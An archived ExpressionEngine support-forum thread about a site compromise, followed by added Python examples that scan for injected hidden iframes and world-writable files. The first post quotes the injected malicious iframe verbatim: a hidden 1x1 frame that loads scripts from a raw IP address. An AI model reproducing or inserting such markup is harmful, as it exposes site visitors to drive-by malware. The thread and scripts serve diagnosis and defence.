ExpressionEngine CMS

This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.

Some validation problems

January 22, 2008 7:11am

  • #1 / Jan 22, 2008 7:11am

    Stefan Balan

    10 posts

    Hey guys,

    I have a small problem. I’m working on this website (the language is Romanian), and for some unknown reason an iframe appears automatically after the html tag is closed. Something like this:

    </html>
    <iframe src='http://62.176.16.193/tds/?id=1' width='1' height='1' style='visibility:hidden'></iframe>

    I really don’t know if EE does this,  it’s not the core version. This is the reason the code is not valid, if I manually check the code removing it, it validates. The website works fine, but I still want it valid.

    Thanks,
    Stefan

  • #2 / Jan 23, 2008 12:07am

    OrganizedFellow

    435 posts

    I really don’t know if EE does this,  it’s not the core version. This is the reason the code is not valid, if I manually check the code removing it, it validates. The website works fine, but I still want it valid.

    1. NOPE. ExpressionEngine does not output any code that you do not insert yourself.
    2. I followed the link in the iframe, and it points to some javascript code. It looks malicious to me.
    My advice would be to contact your host and alert them to a vulnerability to your site.

    It appears to me that someone else inserted that code, if you didn’t.

    As for your validation, I just checked your site, and I see the above iframe as well as a second one. You’ve got to clear those out first.

    Another validation issue is the following code snip:

    <li class="sep"></li>

    Which appears 8 times in your homepage.

    Info: Doctype given is “-//W3C//DTD XHTML 1.0 Strict//EN”
    Info: Document content looks like XHTML 1.0 Transitional

  • #3 / Jan 23, 2008 5:01pm

    Stefan Balan

    10 posts

    It seems like my PC was infected. Now I’m trying to figure out how to remove the iframe, because I don’t find it anywhere. Not in the templates, not in SQL. Any ideas?

    @OrganizedFellow: The doctype was also changed by the malware, and it validates with that class, even if it’s empty. Thanks for the help 😊

  • #4 / Jan 23, 2008 5:35pm

    Lisa Wess

    20502 posts

    Hi, Stefan - I have moved this to technical support.  This looks like it may be a security breach.

    Thanks for reporting this. We take security very seriously and will do our best to work with you on figuring out what’s going on. To that, we need some additional information from you…

    1. EE version and build (found at the bottom of your control panel)
    2. Other scripts on your account, whether in use or not (phpBB, etc…)*

    * If this is a shared hosting environment, the host can make a determination if the attack came through scripts on another account on the server, which is commonly the case with these types of hacks.

    While we work through this, please check through these files:

    * path.php
    * config.php
    * index.php

    to ensure that there is no unusual code such as iFrames or Javascript includes; if you do find that code, then please back-up the file and remove said code.  If you are unsure of what does or doesn’t belong in these files, do not hesitate to ask.

    You may also wish to refresh your files by following the build update instructions.

    Also please ensure that you report this to your host immediately as they can help identify where the attack originated from so that steps can be taken to prevent this in the future.
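
Added example (not part of the original thread and not ExpressionEngine code): one way to run the check described in the post above over `path.php`, `config.php` and `index.php`, flagging markup appended after `</html>` and iframes hidden from the visitor. The sample input is constructed, and the "hidden" heuristic is an assumption, not an ExpressionEngine rule.

```python
import re
import sys
from pathlib import Path

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
CLOSE_HTML_RE = re.compile(r"</html\s*>", re.IGNORECASE)
# Heuristic (assumption): a 0/1-pixel or CSS-hidden frame is not legitimate layout.
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*=\s*['"]?[01](?:px)?['"]?(?=[\s>/])"""
    r"|visibility\s*:\s*hidden|display\s*:\s*none",
    re.IGNORECASE,
)

# Constructed sample: one legitimate frame and one appended hidden frame.
# 192.0.2.1 is a documentation address, not the one from the thread.
SAMPLE = """<?php include 'path.php'; ?>
<html><body>
<iframe src="/map.html" width="600" height="400"></iframe>
</body>
</html>
<iframe src='http://192.0.2.1/x' width='1' height='1' style='visibility:hidden'></iframe>
"""


def line_of(text, pos):
    """1-based line number of character offset pos."""
    return text.count("\n", 0, pos) + 1


def find_injections(text):
    """Return (line, reason, snippet) tuples for the pattern seen in the thread."""
    findings = []
    closes = list(CLOSE_HTML_RE.finditer(text))
    if closes:
        end = closes[-1].end()
        tail = text[end:]
        if tail.strip():  # anything other than whitespace after the last </html>
            pos = end + len(tail) - len(tail.lstrip())
            findings.append((line_of(text, pos), "content after </html>", tail.strip()[:80]))
    for m in IFRAME_RE.finditer(text):
        if HIDDEN_RE.search(m.group(0)):
            findings.append((line_of(text, m.start()), "hidden iframe", m.group(0)[:80]))
    return findings


if __name__ == "__main__":
    # Usage: python scan.py path.php config.php index.php  (no arguments: scan SAMPLE)
    sources = {p: Path(p).read_text(errors="replace") for p in sys.argv[1:]} or {"SAMPLE": SAMPLE}
    for name, text in sources.items():
        for line, reason, snippet in find_injections(text):
            print(f"{name}:{line}: {reason}: {snippet}")
```

A finding is a prompt to back up the file and compare it against a clean copy from the build download, not proof of compromise on its own.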

  • #5 / Jan 23, 2008 5:48pm

    Stefan Balan

    10 posts

    1. Build:  20080118
    2. There are not other scripts installed on this case, but I also “infected” a friend’s blog, based on WordPress.


    Right now I’m preparing to reinstall the operating system on my PC and I will keep you posted with the results. As I already said, I don’t believe it’s an EE bug.

    The only thing I’m afraid of is that the infected code was sent every time I wrote an entry or updated a template. The frustrating thing is that I don’t see that code anywhere, and I scanned my PC twice, with different programs, but none found something. I found the name of the infected file on a Russian website, but didn’t understand too much, just got the name of the file (S87ekhV.exe) and deleted it. Still, the problem isn’t solved.

    I’ll be back with updates. Thanks for the support.

  • #6 / Jan 23, 2008 5:56pm

    Lisa Wess

    20502 posts

    Ok, Stefan, wait.

    I strongly doubt this is your PC.  Have you spoken to the host?  The hackers probably came through the shared hosting system and your host can let you know *where* they gained entry from.

    Did you check the files as suggested in my response?

  • #7 / Jan 23, 2008 6:49pm

    Stefan Balan

    10 posts

    Oh…sorry for my bad English :D

    I just finished reinstalling the OS and I checked the files. You were right, the code was inserted in index.php…the two EE based sites are hosted on different webservers (from different providers)

    edit:

    I can tell for sure that the file was modified when I wrote a post. On one of the two sites I didn’t make any FTP transfer since last week, and yesterday the code was ok, so that’s the only way the script could be injected in the file.

  • #8 / Jan 23, 2008 7:40pm

    Lisa Wess

    20502 posts

    Stefan, did you talk to your host? It is likely that a third party got into the server and modified that file - and that it had nothing to do with any action you took. You need to talk to your host and find out what happened, and alert them so that they can stop it from happening again.

  • #9 / Jan 23, 2008 7:46pm

    Stefan Balan

    10 posts

    I’m still waiting for their answer. Right now here it’s 1:45 am, so I can’t call them now. I will do it tomorrow.

    Thanks again for the great support 😊

  • #10 / Jan 23, 2008 9:50pm

    OrganizedFellow

    435 posts

    @Stefan
    There really was no need to reinstall your OS. But since you did, you are clear on that end.
    If your host does not resolve the problem(s) to your satisfaction, it may be time to switch hosts!

  • #11 / Jan 24, 2008 7:02pm

    Stefan Balan

    10 posts

    The host said no other website was affected, so I guess that’s it. My problem is solved, but still can’t figure out how they hacked me.

    Thanks again for your help 😊

  • #12 / Jan 24, 2008 7:07pm

    Lisa Wess

    20502 posts

    Stefan - did you ask your host to research it and find out how they got in?  What did they say?

  • #13 / Jan 24, 2008 7:13pm

    Stefan Balan

    10 posts

    They assured me that there was no security breach. They said that the files corrupted were in directories with chmod 777, and that’s the reason the attackers could paste the code.

    I think I will switch to another host soon.

  • #14 / Jan 24, 2008 7:18pm

    Sue Crocker

    26054 posts

    I think I will switch to another host soon

    Sounds like a good idea to me.

  • #15 / Jan 24, 2008 7:20pm

    Lisa Wess

    20502 posts

    Well, un-authorized third parties putting malicious code in your files is a security breach.  *shakes head*  In any case, see This comment about permissions and security. =)
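
Added example (not part of the original thread and not ExpressionEngine code): an audit for the condition the host described in post #13, listing every file and directory under a web root that is writable by "other", such as a `chmod 777` directory. The directory and file names in `demo()` are constructed for illustration.

```python
import os
import stat
import sys
import tempfile


def world_writable(root):
    """Return sorted (relative path, mode) pairs under root that any local user can write."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # a symlink's own mode bits say nothing about its target
            if st.st_mode & stat.S_IWOTH:
                mode = format(stat.S_IMODE(st.st_mode), "04o")
                hits.append((os.path.relpath(path, root), mode))
    return sorted(hits)


def demo():
    """Build a constructed web root (names are illustrative) and audit it."""
    with tempfile.TemporaryDirectory() as root:
        layout = {"cache": 0o777, "images": 0o755, "index.php": 0o666, "path.php": 0o644}
        for name, mode in layout.items():
            path = os.path.join(root, name)
            if name.endswith(".php"):
                open(path, "w").close()
            else:
                os.mkdir(path)
            os.chmod(path, mode)  # explicit chmod so the umask does not interfere
        return world_writable(root)


if __name__ == "__main__":
    # Usage: python audit.py /path/to/webroot  (no argument: run the constructed demo)
    results = world_writable(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for rel, mode in results:
        print(f"{mode}  {rel}")
```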
